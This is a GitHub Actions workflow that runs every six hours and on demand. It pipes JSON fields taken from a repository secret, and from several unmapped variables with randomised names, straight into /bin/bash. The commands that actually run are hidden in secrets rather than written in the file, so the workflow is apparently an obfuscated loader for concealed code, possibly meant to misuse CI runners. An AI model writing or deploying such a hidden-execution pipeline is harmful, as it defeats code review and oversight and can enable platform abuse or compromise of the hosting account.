name: pigmanjerky
on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pigmanjerky
        env:
          s2593: ${{ secrets.s2593 }}
        run: |
          echo $s2593 | jq -r .yiz99 | /bin/bash
          echo $fp79003 | jq -r .xeix0 | /bin/bash
          echo $rkwer979 | jq -r .b310 | /bin/bash
          echo $ojom417 | jq -r .hl5128 | /bin/bash
          echo $g15964 | jq -r .ogvo89 | /bin/bash
          echo $a9908 | jq -r .v5 | /bin/bash
          echo $nzvsk78 | jq -r .j594 | /bin/bash
          echo $np5712 | jq -r .jxgj8 | /bin/bash
          echo $wzqh2 | jq -r .vn5 | /bin/bash
          echo $foti644 | jq -r .ay59302 | /bin/bash

